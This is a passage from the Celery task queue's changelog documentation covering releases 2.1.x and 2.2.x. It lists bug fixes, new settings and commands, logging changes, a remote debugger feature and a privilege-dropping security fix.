Fixes ----- * Execution options to `apply_async` now takes precedence over options returned by active routers. This was a regression introduced recently (Issue #244). * curses monitor: Long arguments are now truncated so curses doesn't crash with out of bounds errors (Issue #235). * multi: Channel errors occurring while handling control commands no longer crash the worker but are instead logged with severity error. * SQLAlchemy database backend: Fixed a race condition occurring when the client wrote the pending state. Just like the Django database backend, it does no longer save the pending state (Issue #261 + Issue #262). * Error email body now uses `repr(exception)` instead of `str(exception)`, as the latter could result in Unicode decode errors (Issue #245). * Error email timeout value is now configurable by using the :setting:`EMAIL_TIMEOUT` setting. * `celeryev`: Now works on Windows (but the curses monitor won't work without having curses). * Unit test output no longer emits non-standard characters. * worker: The broadcast consumer is now closed if the connection is reset. * worker: Now properly handles errors occurring while trying to acknowledge the message. * `TaskRequest.on_failure` now encodes traceback using the current file-system encoding (Issue #286). * `EagerResult` can now be pickled (Issue #288). .. _v214-documentation: Documentation ------------- * Adding :ref:`contributing`. * Added :ref:`guide-optimizing`. * Added :ref:`faq-security` section to the FAQ. .. _version-2.1.3: 2.1.3 ===== :release-date: 2010-11-09 05:00 p.m. CEST :release-by: Ask Solem .. _v213-fixes: * Fixed deadlocks in `timer2` which could lead to `djcelerymon`/`celeryev -c` hanging. * `EventReceiver`: now sends heartbeat request to find workers. This means :program:`celeryev` and friends finds workers immediately at start-up. * ``celeryev`` curses monitor: Set screen_delay to 10ms, so the screen refreshes more often. * Fixed pickling errors when pickling :class:`AsyncResult` on older Python versions. * worker: prefetch count was decremented by ETA tasks even if there were no active prefetch limits. .. _version-2.1.2: 2.1.2 ===== :release-data: TBA .. _v212-fixes: Fixes ----- * worker: Now sends the :event:`task-retried` event for retried tasks. * worker: Now honors ignore result for :exc:`~@WorkerLostError` and timeout errors. * ``celerybeat``: Fixed :exc:`UnboundLocalError` in ``celerybeat`` logging when using logging setup signals. * worker: All log messages now includes `exc_info`. .. _version-2.1.1: 2.1.1 ===== :release-date: 2010-10-14 02:00 p.m. CEST :release-by: Ask Solem .. _v211-fixes: Fixes ----- * Now working on Windows again. Removed dependency on the :mod:`pwd`/:mod:`grp` modules. * snapshots: Fixed race condition leading to loss of events. * worker: Reject tasks with an ETA that cannot be converted to a time stamp. See issue #209 * concurrency.processes.pool: The semaphore was released twice for each task (both at ACK and result ready). This has been fixed, and it is now released only once per task. * docs/configuration: Fixed typo `CELERYD_TASK_SOFT_TIME_LIMIT` -> :setting:`CELERYD_TASK_SOFT_TIME_LIMIT`. See issue #214 * control command `dump_scheduled`: was using old .info attribute * multi: Fixed `set changed size during iteration` bug occurring in the restart command. * worker: Accidentally tried to use additional command-line arguments. This would lead to an error like: `got multiple values for keyword argument 'concurrency'`. Additional command-line arguments are now ignored, and doesn't produce this error. However -- we do reserve the right to use positional arguments in the future, so please don't depend on this behavior. * ``celerybeat``: Now respects routers and task execution options again. * ``celerybeat``: Now reuses the publisher instead of the connection. * Cache result backend: Using :class:`float` as the expires argument to `cache.set` is deprecated by the Memcached libraries, so we now automatically cast to :class:`int`. * unit tests: No longer emits logging and warnings in test output. .. _v211-news: News ---- * Now depends on carrot version 0.10.7. * Added :setting:`CELERY_REDIRECT_STDOUTS`, and :setting:`CELERYD_REDIRECT_STDOUTS_LEVEL` settings. :setting:`CELERY_REDIRECT_STDOUTS` is used by the worker and beat. All output to `stdout` and `stderr` will be redirected to the current logger if enabled. :setting:`CELERY_REDIRECT_STDOUTS_LEVEL` decides the log level used and is :const:`WARNING` by default. * Added :setting:`CELERYBEAT_SCHEDULER` setting. This setting is used to define the default for the -S option to :program:`celerybeat`. Example: .. code-block:: python CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler' * Added Task.expires: Used to set default expiry time for tasks. * New remote control commands: `add_consumer` and `cancel_consumer`. .. method:: add_consumer(queue, exchange, exchange_type, routing_key, \*\*options) :module: Tells the worker to declare and consume from the specified declaration. .. method:: cancel_consumer(queue_name) :module: Tells the worker to stop consuming from queue (by queue name). Commands also added to :program:`celeryctl` and :class:`~celery.task.control.inspect`. Example using ``celeryctl`` to start consuming from queue "queue", in exchange "exchange", of type "direct" using binding key "key": .. code-block:: console $ celeryctl inspect add_consumer queue exchange direct key $ celeryctl inspect cancel_consumer queue See :ref:`monitoring-control` for more information about the :program:`celeryctl` program. Another example using :class:`~celery.task.control.inspect`: .. code-block:: pycon >>> from celery.task.control import inspect >>> inspect.add_consumer(queue='queue', exchange='exchange', ... exchange_type='direct', ... routing_key='key', ... durable=False, ... auto_delete=True) >>> inspect.cancel_consumer('queue') * ``celerybeat``: Now logs the traceback if a message can't be sent. * ``celerybeat``: Now enables a default socket timeout of 30 seconds. * ``README``/introduction/homepage: Added link to `Flask-Celery`_. .. _`Flask-Celery`: https://github.com/ask/flask-celery .. _version-2.1.0: 2.1.0 ===== :release-date: 2010-10-08 12:00 p.m. CEST :release-by: Ask Solem .. _v210-important: Important Notes --------------- * Celery is now following the versioning semantics defined by `semver`_. This means we're no longer allowed to use odd/even versioning semantics By our previous versioning scheme this stable release should've been version 2.2. .. _`semver`: http://semver.org * Now depends on Carrot 0.10.7. * No longer depends on SQLAlchemy, this needs to be installed separately if the database result backend is used. * :pypi:`django-celery` now comes with a monitor for the Django Admin interface. This can also be used if you're not a Django user. (Update: Django-Admin monitor has been replaced with Flower, see the Monitoring guide). * If you get an error after upgrading saying: `AttributeError: 'module' object has no attribute 'system'`, Then this is because the `celery.platform` module has been renamed to `celery.platforms` to not collide with the built-in :mod:`platform` module. You have to remove the old :file:`platform.py` (and maybe :file:`platform.pyc`) file from your previous Celery installation. To do this use :program:`python` to find the location of this module: .. code-block:: console $ python >>> import celery.platform >>> celery.platform Here the compiled module is in :file:`/opt/devel/celery/celery/`, to remove the offending files do: .. code-block:: console $ rm -f /opt/devel/celery/celery/platform.py* .. _v210-news: News ---- * Added support for expiration of AMQP results (requires RabbitMQ 2.1.0) The new configuration option :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` sets the expiry time in seconds (can be int or float): .. code-block:: python CELERY_AMQP_TASK_RESULT_EXPIRES = 30 * 60 # 30 minutes. CELERY_AMQP_TASK_RESULT_EXPIRES = 0.80 # 800 ms. * ``celeryev``: Event Snapshots If enabled, the worker sends messages about what the worker is doing. These messages are called "events". The events are used by real-time monitors to show what the cluster is doing, but they're not very useful for monitoring over a longer period of time. Snapshots lets you take "pictures" of the clusters state at regular intervals. This can then be stored in a database to generate statistics with, or even monitoring over longer time periods. :pypi:`django-celery` now comes with a Celery monitor for the Django Admin interface. To use this you need to run the :pypi:`django-celery` snapshot camera, which stores snapshots to the database at configurable intervals. To use the Django admin monitor you need to do the following: 1. Create the new database tables: .. code-block:: console $ python manage.py syncdb 2. Start the :pypi:`django-celery` snapshot camera: .. code-block:: console $ python manage.py celerycam 3. Open up the django admin to monitor your cluster. The admin interface shows tasks, worker nodes, and even lets you perform some actions, like revoking and rate limiting tasks, and shutting down worker nodes. There's also a Debian init.d script for :mod:`~celery.bin.events` available, see :ref:`daemonizing` for more information. New command-line arguments to ``celeryev``: * :option:`celery events --camera`: Snapshot camera class to use. * :option:`celery events --logfile`: Log file * :option:`celery events --loglevel`: Log level * :option:`celery events --maxrate`: Shutter rate limit. * :option:`celery events --freq`: Shutter frequency The :option:`--camera ` argument is the name of a class used to take snapshots with. It must support the interface defined by :class:`celery.events.snapshot.Polaroid`. Shutter frequency controls how often the camera thread wakes up, while the rate limit controls how often it will actually take a snapshot. The rate limit can be an integer (snapshots/s), or a rate limit string which has the same syntax as the task rate limit strings (`"200/m"`, `"10/s"`, `"1/h",` etc). For the Django camera case, this rate limit can be used to control how often the snapshots are written to the database, and the frequency used to control how often the thread wakes up to check if there's anything new. The rate limit is off by default, which means it will take a snapshot for every :option:`--frequency ` seconds. * :func:`~celery.task.control.broadcast`: Added callback argument, this can be used to process replies immediately as they arrive. * ``celeryctl``: New command line utility to manage and inspect worker nodes, apply tasks and inspect the results of tasks. .. seealso:: The :ref:`monitoring-control` section in the :ref:`guide`. Some examples: .. code-block:: console $ celeryctl apply tasks.add -a '[2, 2]' --countdown=10 $ celeryctl inspect active $ celeryctl inspect registered_tasks $ celeryctl inspect scheduled $ celeryctl inspect --help $ celeryctl apply --help * Added the ability to set an expiry date and time for tasks. Example:: >>> # Task expires after one minute from now. >>> task.apply_async(args, kwargs, expires=60) >>> # Also supports datetime >>> task.apply_async(args, kwargs, ... expires=datetime.now() + timedelta(days=1) When a worker receives a task that's been expired it will be marked as revoked (:exc:`~@TaskRevokedError`). * Changed the way logging is configured. We now configure the root logger instead of only configuring our custom logger. In addition we don't hijack the multiprocessing logger anymore, but instead use a custom logger name for different applications: ===================================== ===================================== **Application** **Logger Name** ===================================== ===================================== ``celeryd`` ``"celery"`` ``celerybeat`` ``"celery.beat"`` ``celeryev`` ``"celery.ev"`` ===================================== ===================================== This means that the `loglevel` and `logfile` arguments will affect all registered loggers (even those from third-party libraries). Unless you configure the loggers manually as shown below, that is. *Users can choose to configure logging by subscribing to the :signal:`~celery.signals.setup_logging` signal:* .. code-block:: python from logging.config import fileConfig from celery import signals @signals.setup_logging.connect def setup_logging(**kwargs): fileConfig('logging.conf') If there are no receivers for this signal, the logging subsystem will be configured using the :option:`--loglevel `/ :option:`--logfile ` arguments, this will be used for *all defined loggers*. Remember that the worker also redirects stdout and stderr to the Celery logger, if manually configure logging you also need to redirect the standard outs manually: .. code-block:: python from logging.config import fileConfig from celery import log def setup_logging(**kwargs): import logging fileConfig('logging.conf') stdouts = logging.getLogger('mystdoutslogger') log.redirect_stdouts_to_logger(stdouts, loglevel=logging.WARNING) * worker Added command line option :option:`--include `: A comma separated list of (task) modules to be imported. Example: .. code-block:: console $ celeryd -I app1.tasks,app2.tasks * worker: now emits a warning if running as the root user (euid is 0). * :func:`celery.messaging.establish_connection`: Ability to override defaults used using keyword argument "defaults". * worker: Now uses `multiprocessing.freeze_support()` so that it should work with **py2exe**, **PyInstaller**, **cx_Freeze**, etc. * worker: Now includes more meta-data for the :state:`STARTED` state: PID and host name of the worker that started the task. See issue #181 * subtask: Merge additional keyword arguments to `subtask()` into task keyword arguments. For example: .. code-block:: pycon >>> s = subtask((1, 2), {'foo': 'bar'}, baz=1) >>> s.args (1, 2) >>> s.kwargs {'foo': 'bar', 'baz': 1} See issue #182. * worker: Now emits a warning if there's already a worker node using the same name running on the same virtual host. * AMQP result backend: Sending of results are now retried if the connection is down. * AMQP result backend: `result.get()`: Wait for next state if state isn't in :data:`~celery.states.READY_STATES`. * TaskSetResult now supports subscription. :: >>> res = TaskSet(tasks).apply_async() >>> res[0].get() * Added `Task.send_error_emails` + `Task.error_whitelist`, so these can be configured per task instead of just by the global setting. * Added `Task.store_errors_even_if_ignored`, so it can be changed per Task, not just by the global setting. * The Crontab scheduler no longer wakes up every second, but implements `remaining_estimate` (*Optimization*). * worker: Store :state:`FAILURE` result if the :exc:`~@WorkerLostError` exception occurs (worker process disappeared). * worker: Store :state:`FAILURE` result if one of the `*TimeLimitExceeded` exceptions occurs. * Refactored the periodic task responsible for cleaning up results. * The backend cleanup task is now only added to the schedule if :setting:`CELERY_TASK_RESULT_EXPIRES` is set. * If the schedule already contains a periodic task named "celery.backend_cleanup" it won't change it, so the behavior of the backend cleanup task can be easily changed. * The task is now run every day at 4:00 AM, rather than every day since the first time it was run (using Crontab schedule instead of `run_every`) * Renamed `celery.task.builtins.DeleteExpiredTaskMetaTask` -> :class:`celery.task.builtins.backend_cleanup` * The task itself has been renamed from "celery.delete_expired_task_meta" to "celery.backend_cleanup" See issue #134. * Implemented `AsyncResult.forget` for SQLAlchemy/Memcached/Redis/Tokyo Tyrant backends (forget and remove task result). See issue #184. * :meth:`TaskSetResult.join `: Added 'propagate=True' argument. When set to :const:`False` exceptions occurring in subtasks will not be re-raised. * Added `Task.update_state(task_id, state, meta)` as a shortcut to `task.backend.store_result(task_id, meta, state)`. The backend interface is "private" and the terminology outdated, so better to move this to :class:`~celery.task.base.Task` so it can be used. * timer2: Set `self.running=False` in :meth:`~celery.utils.timer2.Timer.stop` so it won't try to join again on subsequent calls to `stop()`. * Log colors are now disabled by default on Windows. * `celery.platform` renamed to :mod:`celery.platforms`, so it doesn't collide with the built-in :mod:`platform` module. * Exceptions occurring in Mediator+Pool callbacks are now caught and logged instead of taking down the worker. * Redis result backend: Now supports result expiration using the Redis `EXPIRE` command. * unit tests: Don't leave threads running at tear down. * worker: Task results shown in logs are now truncated to 46 chars. * `Task.__name__` is now an alias to `self.__class__.__name__`. This way tasks introspects more like regular functions. * `Task.retry`: Now raises :exc:`TypeError` if kwargs argument is empty. See issue #164. * ``timedelta_seconds``: Use ``timedelta.total_seconds`` if running on Python 2.7 * :class:`~kombu.utils.limits.TokenBucket`: Generic Token Bucket algorithm * :mod:`celery.events.state`: Recording of cluster state can now be paused and resumed, including support for buffering. .. method:: State.freeze(buffer=True) Pauses recording of the stream. If `buffer` is true, events received while being frozen will be buffered, and may be replayed later. .. method:: State.thaw(replay=True) Resumes recording of the stream. If `replay` is true, then the recorded buffer will be applied. .. method:: State.freeze_while(fun) With a function to apply, freezes the stream before, and replays the buffer after the function returns. * :meth:`EventReceiver.capture ` Now supports a timeout keyword argument. * worker: The mediator thread is now disabled if :setting:`CELERY_RATE_LIMITS` is enabled, and tasks are directly sent to the pool without going through the ready queue (*Optimization*). .. _v210-fixes: Fixes ----- * Pool: Process timed out by `TimeoutHandler` must be joined by the Supervisor, so don't remove it from the internal process list. See issue #192. * `TaskPublisher.delay_task` now supports exchange argument, so exchange can be overridden when sending tasks in bulk using the same publisher See issue #187. * the worker no longer marks tasks as revoked if :setting:`CELERY_IGNORE_RESULT` is enabled. See issue #207. * AMQP Result backend: Fixed bug with `result.get()` if :setting:`CELERY_TRACK_STARTED` enabled. `result.get()` would stop consuming after receiving the :state:`STARTED` state. * Fixed bug where new processes created by the pool supervisor becomes stuck while reading from the task Queue. See http://bugs.python.org/issue10037 * Fixed timing issue when declaring the remote control command reply queue This issue could result in replies being lost, but have now been fixed. * Backward compatible `LoggerAdapter` implementation: Now works for Python 2.4. Also added support for several new methods: `fatal`, `makeRecord`, `_log`, `log`, `isEnabledFor`, `addHandler`, `removeHandler`. .. _v210-experimental: Experimental ------------ * multi: Added daemonization support. multi can now be used to start, stop and restart worker nodes: .. code-block:: console $ celeryd-multi start jerry elaine george kramer This also creates PID files and log files (:file:`celeryd@jerry.pid`, ..., :file:`celeryd@jerry.log`. To specify a location for these files use the `--pidfile` and `--logfile` arguments with the `%n` format: .. code-block:: console $ celeryd-multi start jerry elaine george kramer \ --logfile=/var/log/celeryd@%n.log \ --pidfile=/var/run/celeryd@%n.pid Stopping: .. code-block:: console $ celeryd-multi stop jerry elaine george kramer Restarting. The nodes will be restarted one by one as the old ones are shutdown: .. code-block:: console $ celeryd-multi restart jerry elaine george kramer Killing the nodes (**WARNING**: Will discard currently executing tasks): .. code-block:: console $ celeryd-multi kill jerry elaine george kramer See `celeryd-multi help` for help. * multi: `start` command renamed to `show`. `celeryd-multi start` will now actually start and detach worker nodes. To just generate the commands you have to use `celeryd-multi show`. * worker: Added `--pidfile` argument. The worker will write its pid when it starts. The worker will not be started if this file exists and the pid contained is still alive. * Added generic init.d script using `celeryd-multi` https://github.com/celery/celery/tree/master/extra/generic-init.d/celeryd .. _v210-documentation: Documentation ------------- * Added User guide section: Monitoring * Added user guide section: Periodic Tasks Moved from `getting-started/periodic-tasks` and updated. * tutorials/external moved to new section: "community". * References has been added to all sections in the documentation. This makes it easier to link between documents. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-2.2.rst0000664000175000017500000010151000000000000020304 0ustar00asifasif00000000000000.. _changelog-2.2: =============================== Change history for Celery 2.2 =============================== .. contents:: :local: .. _version-2.2.8: 2.2.8 ===== :release-date: 2011-11-25 04:00 p.m. GMT :release-by: Ask Solem .. _v228-security-fixes: Security Fixes -------------- * [Security: `CELERYSA-0001`_] Daemons would set effective id's rather than real id's when the :option:`--uid `/ :option:`--gid ` arguments to :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat` and :program:`celery events` were used. This means privileges weren't properly dropped, and that it would be possible to regain supervisor privileges later. .. _`CELERYSA-0001`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt .. _version-2.2.7: 2.2.7 ===== :release-date: 2011-06-13 04:00 p.m. BST :release-by: Ask Solem * New signals: :signal:`after_setup_logger` and :signal:`after_setup_task_logger` These signals can be used to augment logging configuration after Celery has set up logging. * Redis result backend now works with Redis 2.4.4. * multi: The :option:`--gid ` option now works correctly. * worker: Retry wrongfully used the repr of the traceback instead of the string representation. * App.config_from_object: Now loads module, not attribute of module. * Fixed issue where logging of objects would give "" .. _version-2.2.6: 2.2.6 ===== :release-date: 2011-04-15 04:00 p.m. CEST :release-by: Ask Solem .. _v226-important: Important Notes --------------- * Now depends on :pypi:`Kombu` 1.1.2. * Dependency lists now explicitly specifies that we don't want :pypi:`python-dateutil` 2.x, as this version only supports Python 3. If you have installed dateutil 2.0 by accident you should downgrade to the 1.5.0 version: .. code-block:: console $ pip install -U python-dateutil==1.5.0 or by ``easy_install``: .. code-block:: console $ easy_install -U python-dateutil==1.5.0 .. _v226-fixes: Fixes ----- * The new ``WatchedFileHandler`` broke Python 2.5 support (Issue #367). * Task: Don't use ``app.main`` if the task name is set explicitly. * Sending emails didn't work on Python 2.5, due to a bug in the version detection code (Issue #378). * Beat: Adds method ``ScheduleEntry._default_now`` This method can be overridden to change the default value of ``last_run_at``. * An error occurring in process cleanup could mask task errors. We no longer propagate errors happening at process cleanup, but log them instead. This way they won't interfere with publishing the task result (Issue #365). * Defining tasks didn't work properly when using the Django ``shell_plus`` utility (Issue #366). * ``AsyncResult.get`` didn't accept the ``interval`` and ``propagate`` arguments. * worker: Fixed a bug where the worker wouldn't shutdown if a :exc:`socket.error` was raised. .. _version-2.2.5: 2.2.5 ===== :release-date: 2011-03-28 06:00 p.m. CEST :release-by: Ask Solem .. _v225-important: Important Notes --------------- * Now depends on Kombu 1.0.7 .. _v225-news: News ---- * Our documentation is now hosted by Read The Docs (http://docs.celeryproject.org), and all links have been changed to point to the new URL. * Logging: Now supports log rotation using external tools like `logrotate.d`_ (Issue #321) This is accomplished by using the ``WatchedFileHandler``, which re-opens the file if it's renamed or deleted. .. _`logrotate.d`: http://www.ducea.com/2006/06/06/rotating-linux-log-files-part-2-logrotate/ * ``otherqueues`` tutorial now documents how to configure Redis/Database result backends. * gevent: Now supports ETA tasks. But gevent still needs ``CELERY_DISABLE_RATE_LIMITS=True`` to work. * TaskSet User Guide: now contains TaskSet callback recipes. * Eventlet: New signals: * ``eventlet_pool_started`` * ``eventlet_pool_preshutdown`` * ``eventlet_pool_postshutdown`` * ``eventlet_pool_apply`` See :mod:`celery.signals` for more information. * New :setting:`BROKER_TRANSPORT_OPTIONS` setting can be used to pass additional arguments to a particular broker transport. * worker: ``worker_pid`` is now part of the request info as returned by broadcast commands. * TaskSet.apply/Taskset.apply_async now accepts an optional ``taskset_id`` argument. * The taskset_id (if any) is now available in the Task request context. * SQLAlchemy result backend: taskset_id and taskset_id columns now have a unique constraint (tables need to recreated for this to take affect). * Task user guide: Added section about choosing a result backend. * Removed unused attribute ``AsyncResult.uuid``. .. _v225-fixes: Fixes ----- * multiprocessing.Pool: Fixes race condition when marking job with ``WorkerLostError`` (Issue #268). The process may have published a result before it was terminated, but we have no reliable way to detect that this is the case. So we have to wait for 10 seconds before marking the result with WorkerLostError. This gives the result handler a chance to retrieve the result. * multiprocessing.Pool: Shutdown could hang if rate limits disabled. There was a race condition when the MainThread was waiting for the pool semaphore to be released. The ResultHandler now terminates after 5 seconds if there are unacked jobs, but no worker processes left to start them (it needs to timeout because there could still be an ack+result that we haven't consumed from the result queue. It is unlikely we'll receive any after 5 seconds with no worker processes). * ``celerybeat``: Now creates pidfile even if the ``--detach`` option isn't set. * eventlet/gevent: The broadcast command consumer is now running in a separate green-thread. This ensures broadcast commands will take priority even if there are many active tasks. * Internal module ``celery.worker.controllers`` renamed to ``celery.worker.mediator``. * worker: Threads now terminates the program by calling ``os._exit``, as it is the only way to ensure exit in the case of syntax errors, or other unrecoverable errors. * Fixed typo in ``maybe_timedelta`` (Issue #352). * worker: Broadcast commands now logs with loglevel debug instead of warning. * AMQP Result Backend: Now resets cached channel if the connection is lost. * Polling results with the AMQP result backend wasn't working properly. * Rate limits: No longer sleeps if there are no tasks, but rather waits for the task received condition (Performance improvement). * ConfigurationView: ``iter(dict)`` should return keys, not items (Issue #362). * ``celerybeat``: PersistentScheduler now automatically removes a corrupted schedule file (Issue #346). * Programs that doesn't support positional command-line arguments now provides a user friendly error message. * Programs no longer tries to load the configuration file when showing ``--version`` (Issue #347). * Autoscaler: The "all processes busy" log message is now severity debug instead of error. * worker: If the message body can't be decoded, it's now passed through ``safe_str`` when logging. This to ensure we don't get additional decoding errors when trying to log the failure. * ``app.config_from_object``/``app.config_from_envvar`` now works for all loaders. * Now emits a user-friendly error message if the result backend name is unknown (Issue #349). * ``celery.contrib.batches``: Now sets loglevel and logfile in the task request so ``task.get_logger`` works with batch tasks (Issue #357). * worker: An exception was raised if using the amqp transport and the prefetch count value exceeded 65535 (Issue #359). The prefetch count is incremented for every received task with an ETA/countdown defined. The prefetch count is a short, so can only support a maximum value of 65535. If the value exceeds the maximum value we now disable the prefetch count, it's re-enabled as soon as the value is below the limit again. * ``cursesmon``: Fixed unbound local error (Issue #303). * eventlet/gevent is now imported on demand so autodoc can import the modules without having eventlet/gevent installed. * worker: Ack callback now properly handles ``AttributeError``. * ``Task.after_return`` is now always called *after* the result has been written. * Cassandra Result Backend: Should now work with the latest ``pycassa`` version. * multiprocessing.Pool: No longer cares if the ``putlock`` semaphore is released too many times (this can happen if one or more worker processes are killed). * SQLAlchemy Result Backend: Now returns accidentally removed ``date_done`` again (Issue #325). * Task.request context is now always initialized to ensure calling the task function directly works even if it actively uses the request context. * Exception occurring when iterating over the result from ``TaskSet.apply`` fixed. * eventlet: Now properly schedules tasks with an ETA in the past. .. _version-2.2.4: 2.2.4 ===== :release-date: 2011-02-19 00:00 AM CET :release-by: Ask Solem .. _v224-fixes: Fixes ----- * worker: 2.2.3 broke error logging, resulting in tracebacks not being logged. * AMQP result backend: Polling task states didn't work properly if there were more than one result message in the queue. * ``TaskSet.apply_async()`` and ``TaskSet.apply()`` now supports an optional ``taskset_id`` keyword argument (Issue #331). * The current taskset id (if any) is now available in the task context as ``request.taskset`` (Issue #329). * SQLAlchemy result backend: `date_done` was no longer part of the results as it had been accidentally removed. It's now available again (Issue #325). * SQLAlchemy result backend: Added unique constraint on `Task.id` and `TaskSet.taskset_id`. Tables needs to be recreated for this to take effect. * Fixed exception raised when iterating on the result of ``TaskSet.apply()``. * Tasks user guide: Added section on choosing a result backend. .. _version-2.2.3: 2.2.3 ===== :release-date: 2011-02-12 04:00 p.m. CET :release-by: Ask Solem .. _v223-fixes: Fixes ----- * Now depends on :pypi:`Kombu` 1.0.3 * Task.retry now supports a ``max_retries`` argument, used to change the default value. * `multiprocessing.cpu_count` may raise :exc:`NotImplementedError` on platforms where this isn't supported (Issue #320). * Coloring of log messages broke if the logged object wasn't a string. * Fixed several typos in the init-script documentation. * A regression caused `Task.exchange` and `Task.routing_key` to no longer have any effect. This is now fixed. * Routing user guide: Fixes typo, routers in :setting:`CELERY_ROUTES` must be instances, not classes. * :program:`celeryev` didn't create pidfile even though the :option:`--pidfile ` argument was set. * Task logger format was no longer used (Issue #317). The id and name of the task is now part of the log message again. * A safe version of ``repr()`` is now used in strategic places to ensure objects with a broken ``__repr__`` doesn't crash the worker, or otherwise make errors hard to understand (Issue #298). * Remote control command :control:`active_queues`: didn't account for queues added at runtime. In addition the dictionary replied by this command now has a different structure: the exchange key is now a dictionary containing the exchange declaration in full. * The :option:`celery worker -Q` option removed unused queue declarations, so routing of tasks could fail. Queues are no longer removed, but rather `app.amqp.queues.consume_from()` is used as the list of queues to consume from. This ensures all queues are available for routing purposes. * ``celeryctl``: Now supports the `inspect active_queues` command. .. _version-2.2.2: 2.2.2 ===== :release-date: 2011-02-03 04:00 p.m. CET :release-by: Ask Solem .. _v222-fixes: Fixes ----- * ``celerybeat`` couldn't read the schedule properly, so entries in :setting:`CELERYBEAT_SCHEDULE` wouldn't be scheduled. * Task error log message now includes `exc_info` again. * The `eta` argument can now be used with `task.retry`. Previously it was overwritten by the countdown argument. * ``celery multi``/``celeryd_detach``: Now logs errors occurring when executing the `celery worker` command. * daemonizing tutorial: Fixed typo ``--time-limit 300`` -> ``--time-limit=300`` * Colors in logging broke non-string objects in log messages. * ``setup_task_logger`` no longer makes assumptions about magic task kwargs. .. _version-2.2.1: 2.2.1 ===== :release-date: 2011-02-02 04:00 p.m. CET :release-by: Ask Solem .. _v221-fixes: Fixes ----- * Eventlet pool was leaking memory (Issue #308). * Deprecated function ``celery.execute.delay_task`` was accidentally removed, now available again. * ``BasePool.on_terminate`` stub didn't exist * ``celeryd_detach``: Adds readable error messages if user/group name doesn't exist. * Smarter handling of unicode decode errors when logging errors. .. _version-2.2.0: 2.2.0 ===== :release-date: 2011-02-01 10:00 AM CET :release-by: Ask Solem .. _v220-important: Important Notes --------------- * Carrot has been replaced with :pypi:`Kombu` Kombu is the next generation messaging library for Python, fixing several flaws present in Carrot that was hard to fix without breaking backwards compatibility. Also it adds: * First-class support for virtual transports; Redis, Django ORM, SQLAlchemy, Beanstalk, MongoDB, CouchDB and in-memory. * Consistent error handling with introspection, * The ability to ensure that an operation is performed by gracefully handling connection and channel errors, * Message compression (:mod:`zlib`, :mod:`bz2`, or custom compression schemes). This means that `ghettoq` is no longer needed as the functionality it provided is already available in Celery by default. The virtual transports are also more feature complete with support for exchanges (direct and topic). The Redis transport even supports fanout exchanges so it's able to perform worker remote control commands. * Magic keyword arguments pending deprecation. The magic keyword arguments were responsible for many problems and quirks: notably issues with tasks and decorators, and name collisions in keyword arguments for the unaware. It wasn't easy to find a way to deprecate the magic keyword arguments, but we think this is a solution that makes sense and it won't have any adverse effects for existing code. The path to a magic keyword argument free world is: * the `celery.decorators` module is deprecated and the decorators can now be found in `celery.task`. * The decorators in `celery.task` disables keyword arguments by default * All examples in the documentation have been changed to use `celery.task`. This means that the following will have magic keyword arguments enabled (old style): .. code-block:: python from celery.decorators import task @task() def add(x, y, **kwargs): print('In task %s' % kwargs['task_id']) return x + y And this won't use magic keyword arguments (new style): .. code-block:: python from celery.task import task @task() def add(x, y): print('In task %s' % add.request.id) return x + y In addition, tasks can choose not to accept magic keyword arguments by setting the `task.accept_magic_kwargs` attribute. .. admonition:: Deprecation Using the decorators in :mod:`celery.decorators` emits a :class:`PendingDeprecationWarning` with a helpful message urging you to change your code, in version 2.4 this will be replaced with a :class:`DeprecationWarning`, and in version 4.0 the :mod:`celery.decorators` module will be removed and no longer exist. Similarly, the `task.accept_magic_kwargs` attribute will no longer have any effect starting from version 4.0. * The magic keyword arguments are now available as `task.request` This is called *the context*. Using thread-local storage the context contains state that's related to the current request. It's mutable and you can add custom attributes that'll only be seen by the current task request. The following context attributes are always available: ===================================== =================================== **Magic Keyword Argument** **Replace with** ===================================== =================================== `kwargs['task_id']` `self.request.id` `kwargs['delivery_info']` `self.request.delivery_info` `kwargs['task_retries']` `self.request.retries` `kwargs['logfile']` `self.request.logfile` `kwargs['loglevel']` `self.request.loglevel` `kwargs['task_is_eager']` `self.request.is_eager` **NEW** `self.request.args` **NEW** `self.request.kwargs` ===================================== =================================== In addition, the following methods now automatically uses the current context, so you don't have to pass `kwargs` manually anymore: * `task.retry` * `task.get_logger` * `task.update_state` * `Eventlet`_ support. This is great news for I/O-bound tasks! To change pool implementations you use the :option:`celery worker --pool` argument, or globally using the :setting:`CELERYD_POOL` setting. This can be the full name of a class, or one of the following aliases: `processes`, `eventlet`, `gevent`. For more information please see the :ref:`concurrency-eventlet` section in the User Guide. .. admonition:: Why not gevent? For our first alternative concurrency implementation we've focused on `Eventlet`_, but there's also an experimental `gevent`_ pool available. This is missing some features, notably the ability to schedule ETA tasks. Hopefully the `gevent`_ support will be feature complete by version 2.3, but this depends on user demand (and contributions). .. _`Eventlet`: http://eventlet.net .. _`gevent`: http://gevent.org * Python 2.4 support deprecated! We're happy^H^H^H^H^Hsad to announce that this is the last version to support Python 2.4. You're urged to make some noise if you're currently stuck with Python 2.4. Complain to your package maintainers, sysadmins and bosses: tell them it's time to move on! Apart from wanting to take advantage of :keyword:`with` statements, coroutines, conditional expressions and enhanced :keyword:`try` blocks, the code base now contains so many 2.4 related hacks and workarounds it's no longer just a compromise, but a sacrifice. If it really isn't your choice, and you don't have the option to upgrade to a newer version of Python, you can just continue to use Celery 2.2. Important fixes can be back ported for as long as there's interest. * worker: Now supports Autoscaling of child worker processes. The :option:`--autoscale ` option can be used to configure the minimum and maximum number of child worker processes: .. code-block:: text --autoscale=AUTOSCALE Enable autoscaling by providing max_concurrency,min_concurrency. Example: --autoscale=10,3 (always keep 3 processes, but grow to 10 if necessary). * Remote Debugging of Tasks ``celery.contrib.rdb`` is an extended version of :mod:`pdb` that enables remote debugging of processes that doesn't have terminal access. Example usage: .. code-block:: text from celery.contrib import rdb from celery.task import task @task() def add(x, y): result = x + y # set breakpoint rdb.set_trace() return result :func:`~celery.contrib.rdb.set_trace` sets a breakpoint at the current location and creates a socket you can telnet into to remotely debug your task. The debugger may be started by multiple processes at the same time, so rather than using a fixed port the debugger will search for an available port, starting from the base port (6900 by default). The base port can be changed using the environment variable :envvar:`CELERY_RDB_PORT`. By default the debugger will only be available from the local host, to enable access from the outside you have to set the environment variable :envvar:`CELERY_RDB_HOST`. When the worker encounters your breakpoint it 